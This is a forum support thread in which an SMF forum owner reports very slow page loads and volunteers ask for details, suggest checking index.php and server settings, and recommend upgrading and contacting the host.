News:

Bored?  Looking to kill some time?  Want to chat with other SMF users?  Join us in IRC chat or Discord

Main Menu

My SMF Forum Now Incredibly Slow

Started by pintosal, March 28, 2016, 12:58:43 PM

Previous topic - Next topic

pintosal

Over the past couple of weeks my SMF has become very slow.

Previously it opened in a couple of second, but now it's down to minutes.

My cpanel provider says there's a problem with index.php, but could not be more specific.

I know practically nothing about php, and would appreciate some guidance.

Sorry to be so vague, but I'm no techie.

Kindred

what is your site URL?

smf version?
mods installed?
Слaва
Украинi

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."

Sir Osis of Liver

Ashes and diamonds, foe and friend,
 we were all equal in the end.

- R. Waters

Illori

Quote from: Sir Osis of Liver on March 28, 2016, 01:02:28 PM
Attach your index.php.

i really doubt index.php is the cause of the issue since almost all of SMF goes through that one file.

Sir Osis of Liver

All of the forum is slow.  Sometimes hosts are correct (not often).  Could be a hack.  No harm in looking.

- R. Waters

Shambles

^-- after all that, try ticking "Disable hostname lookups" in the server settings of the ACP. Has been known to improve things in some cases...

JBlaze

Let's hold off on the theories until OP provides us with a link to their site. Then we can diagnose from there :)
Jason Clemons
Former Team Member 2009 - 2012

pintosal

Illori

i see nothing wrong with your index.php file other then you need to upgrade to 2.0.11.

your footer says you are on 2.0.11, but your file does not match that.

a10

Indeed very slow, I'd ask the host (looks like ukwebsolutionsdirect.co.uk) to do some tests into what's going on.